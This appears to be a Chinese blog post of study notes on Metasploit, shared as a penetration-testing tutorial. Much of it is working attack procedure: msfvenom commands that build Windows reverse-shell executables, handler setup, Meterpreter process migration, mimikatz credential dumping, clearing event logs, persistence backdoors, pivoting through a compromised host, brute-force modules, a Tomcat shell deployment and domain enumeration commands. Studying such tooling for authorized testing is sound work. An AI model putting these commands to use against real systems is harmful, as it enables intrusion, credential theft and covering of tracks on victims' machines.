metasploit快速入门
今天没上班,在小黑屋里看了一个一百多页的书《metasploit新手指南》,在此将笔记分享给大家。欢迎大家批评指正,共同学习进步。
metasploit新手指南
笔记
kali
0x01
metapoit基本文件结构如下:
config metasploit的环境配置信息,数据库配置信息
data渗透后模块的一些工具及payload,第三方小工具集合,用户字典等数据信息
Db rails编译生成msf的web框架的数据库信息
Documentation 用户说明文档及开发文档
External metasploit的一些基础扩展模块
Libs metasploit的一些基础类和第三方模块类
Log metasploit运行时的一些系统信息和其他信息
Modules metasploit的系统工具模块,包括预辅助模块(auxiliary),渗透模块(exploits),攻击载荷(payloads)和后渗透模块(posts),以及空字段模块(nops)和编码模块(Encode rs)
Msfinscan 对bin文件偏移地址扫描
Msfconsole metasploit的基本命令行,集成了各种功能。
Msfelfscan对linux的elf文件便移地址进行扫描
。
msfmachscan 功能同msfelfscan
msfpescan 对windows的pe格式文件偏移地址进行扫描。
msfvenom 集成了msfpayload和msfencode的功能,效率更高替代了msf payload和msfencode
Plugins metasploit的第三方插件接口.
scripts metasploit的常用后渗透模块,区别与data里的后渗透模块,不需要加post参数和绝对路径,可以直接运行。
0x02
search 参数
可以搜索到你metasploit存在利用模块
use 参数:
你想利用某个payload,或者某个模块都要用use参数。
show options 参数
他可以看到利用模块设置信息
info 参数:
他可以看到模块的所有的详细介绍信息
set 参数:
他是设置Basic targets选项,如set target 1
set session 1
back 参数:
如果想重新选择一个新的利用模块就要用back返回。
exit 参数:
exit和back一样,一个是返回,一个是退出
kill 参数:
杀死一个进程。
0x03
扫描阶段为了方便查看扫描的结果,那么就需要开启postgresql数据库。
search portscanner
use &&
show optionns
run
0x04
生成器msfvenom
root@mvp:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.105.1 lPORT=8099 -f exe >shell.exe
0x05
msfvenom编码生成
https载荷突破防火墙的设置
payload inject射入载荷(相当于把另一个payload添加进原有的会话id,从而返回一个新的绘画id)
auto RDP Port 自动化开3389也可以开任意端口
Inject in Memory 射入内存
0x06
安卓payload生成
0x07
cobaltstrike
一款以metasploit为基础的GUI的框架式渗透工具。
0x08
meterpreter命令分为:
1、核心命令
2、STDapi 文件指令
3、STDapi 网络指令
4、STDapi 用户接口指令
5、STDapi web cam命令
6、STDapi 文件系统命令
7、Priv 提权命令
8、priv 密码数据库命令
9、Priv 时间戳命令
攻击win7.
1
root@mvp:/var/www/html# msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.105.1 LPORT=6745 -f exe >win.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 502 bytes
Final size of exe file: 73802 bytes
2
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.105.1
set lport 6745
sessions
sessions -i 1
migrate命令
迁移目标机的一个进程到另一个进程
meterpreter > getpid
Current pid: 3232
meterpreter > run post/windows/manage/migrate
[] Running module against PC-20170804GGMB
[] Current server process: win.exe (3232)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3356
[+] Successfully migrated to process 3356
脚本命令:rum_checkmv检查远程主机是虚拟机还是真正的主机。
run getgui添加用户的命令
run vnc看对方桌面
run packetrecorder -i 0 查看目标系统的所有流量,并且进行数据包记录。
load mimikatz
clearev 清除事件日志
0x09
一:获取meterpreter。
1首先生成可执行文件
root@mvp:~# msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.105.1 LPORT=8934 -f exe > she.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 543 bytes
Final size of exe file: 73802 bytes```
msf > **use multi/handler**
msf exploit(handler) > **set payload windows/meterpreter/reverse_https**
payload => windows/meterpreter/reverse_https
msf exploit(handler) > **set LHOST 192.168.1.105**
LHOST => 192.168.1.105
msf exploit(handler) > **set LPORT 8934**
LPORT => 8934
msf exploit(handler) > **set SessionCommunicationTimeout 0**
SessionCommunicationTimeout => 0
msf exploit(handler) > **set exit0nsession false**
exit0nsession => false
msf exploit(handler) > **exploit -j**
---
二。Meterpreter基本隧道代理
portfwd是meterpreter提供的一种基本端口转发,portfwd可以反弹单个端口到本地,并且监听。
pivot是meterpreter的最常用的一种代理,可以轻松把你的机器代理到受害者内网环境下面介绍下pivot使用方法route add添加临时路由表。使用方法:route add添加临时路由表。
在metasploit添加一个路由表,目的是访问10.1.1.129,将通过meterpreter的会话1来访问。
meterpreter>route
meterpreter>run get_local_subnets 查看路由段
10.1.1.129 255.255.255.255 1 我们的路由标段是这个
Ms exploit(handler)>route add 10.1.1.129 255.255.255.255 1添加路由至本地
route print
===============================
subnet netmask gateway
10.1.1.129 255.255.255.255 session 1
这里如果要代理10.1.1.129/24到session 1,则可以这么写。
到这里pivot已经配置好了,你在msf里对10.1.1.129进行扫描(db_nmap)或者访问(psexe模块,ssh模块)将通过代理session 1 这个回话来访问,如果想通过其他应用程序来使用这个代理怎么办呢,这时候可以借助metasploit socks4a提供一个i监听隧道供其他应用程序访问。
首先使用sockes4a并且配置,监听端口
msf > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options
Module options (auxiliary/server/socks4a):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on.
Auxiliary action:
Name Description
---- -----------
Proxy
msf auxiliary(socks4a) > exploit -y
[] Auxiliary module execution completed
msf auxiliary(socks4a) >
[] Starting the socks4a proxy server
查看监听端口:
msf auxiliary(socks4a) > netstat -ano | grep "1080"
[*] exec: netstat -ano | grep "1080"
tcp 0 0 0.0.0.0:1080 0.0.0.0:* LISTEN off (0.00/0/0)
端口已经监听,接着配置proxychains
0x10
权限维护。metasploit后门并不怎么好用,建议拿到控制权限后利用外部第三方后门。
一msf中自带后门。
persistence
metsvc
scheduleme & schtasks
0x11
信息搜集
要想很好的搜集信息并为了有一个良好的查看结果,那么我们要做好以下启动msfconsole的三步:启动数据库;查看数据库;链接数据库。
端口扫描:search portscan
目前两大扫描模式:syn/tcp
smb_version识别windows的版本
use auxiliary/scanner/smb/smb_version
mssql_ping默认mssql会监听1433端口或者一个随机的tcp端口,如果监听的是随机端口,可以通过UDP在1433端口查询具体监听的是哪个端口。
use auxiliary/scanner/mssql/mssql_ping
ssh_version识别ssh软件版本
auxiliary/scanner/ssh/ssh_version
ftp_version寻找目标网络中ftp server
暴力破解
kali自带字典路径
/usr/share/metasploit-framework/data/wordlists
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/http/tomcat_mgr_login
假设tomcat帐号密码爆破成功,下面可以拿shell:
exploit/multi/http/tomcat_mgr_deploy
metasploit常见探测服务模块:
**端口扫描**
auxiliary/scanner/portscan
scanner/portscan/ack
scanner/portscan/ftpbounce ftp跳端口扫描
scanner/portscan/syn
scanner/portscan/tcp
scanner/portscan/xmss tcp"xmss"端口扫描
smb扫描
auxiliary/scanner/smb/smb_enumusers smb枚举
auxiliary/scanner/smb/pipe_dcerpc_auditor 返回dcerpc信息
auxiliary/scanner/smb/smb2 扫描smb2协议
auxiliary/scanner/smb/smb_enumshares 扫描smb共享文件
auxiliary/scanner/smb/smb_enumusers 枚举系统上的用户
auxiliary/scanner/smb/smb_login smb登录
use windows/smb/psexec smb登录
auxiliary/scanner/smb/smb_lookupsid 扫描组的用户
auxiliary/scanner/smb/smb_version 扫描系统版本
mssql扫描
admin/mssql/mssql_enum mssql枚举
admin/mssql/mssql_exec mssql执行命令
admin/mssql/mssql_sql mssql查询
scanner/mssql/mssql_login mssql登录工具
另外还有一个mssql_payload模块
smtp扫描
auxiliary/scanner/smtp/smtp_enum smtp枚举
auxiliary/scanner/smtp/smtp_version 扫描smtp版本
snmp扫描
auxiliary/scanner/snmap/community 通过snmp扫描设备
scanner/snmap/community snmp扫描
ssh扫描
auxiliary/scanner/ssh/ssh_login ssh登录
auxiliary/scanner/ssh/ssh_login_pubkey ssh公共 密钥认证登录
auxiliary/scanner/ssh/ssh_version 扫描ssh版本测试
telnet扫描
auxiliary/scanner/telnet/telnet_login telnet登录
auxiliary/scanner/telnet/telnet_version telnet版本
tftp扫描
auxiliary/scanner/tftp/tftpbrute 扫描tftp的文件
scanner/ftp/anonymous ftp版本扫描
arp扫描
auxiliary/scanner/discovery/arp_sweep
auxiliary/scanner/discovery/udp_prode 扫描UDP服务主机
auxiliary/scanner/discovery/udp_sweep 检测常用的udp服务
auxiliary/sniffer/psnuffle sniffer密码
scanner/vnc/vnc_none_auth vnc服务无认证扫描模块
web服务器信息扫描模块
auxiliary/scanner/http下面的http_version,open_proxy,robots_txt,frontpage_login,tomcat_administration,tomcat_utf8_traversal,options,drupal_views_user_enum,scraper,svn_scanner,trace,vhost_scanner,webdav_internal_ip,webdav_scanner,webdav_website_content
文件目录扫描模块
auxiliary/scanner/http/下的backup_file,brute_dirs,copy_of_file,dir_listing,dir_scanner,dir_webdav_unicode_bypass,file_sanme_dir,files_dir,http_put,ms09_020_webdav_unicode_bypass,prev_dir_same_name_file,replace_ext,soap_xml,trace_axd,verb__auth_bypass
auxiliary/scanner/dos/http/apache_range_dos
web应用程序扫描模块
auxiliary/scanner/http/blind_sql_query
auxiliary/scanner/http/error_sql_injection
auxiliary/scanner/http/http_tracersal
auxiliary/scanner/http/rails_mass_assignment
exploit/multi/http/lcms_php_exec
0x12
反弹meterpreter
尝试提权2012服务器
尝试当前帐号bypass提权
相关信息搜集 域信息搜集
net user /domain
net group "domain computer" /domain
net group "domain admins" /domain 查看域管理员
net localgroup administrators
net view /domain
信息分析获取一台服务器权限
net user \ip\c内网渗透的工作:域信息搜集入侵
mimikaz抓取明文
查看抓取到的用户的详细信息net user xxx /domain
尝试使用域令牌假冒
利用smb传递
1使用当前获取到的两个用户权限,快速的进行扫描
2smb_login扫描
3端口转发进内网
4meterpreter端口转发
5msf的socks4a转发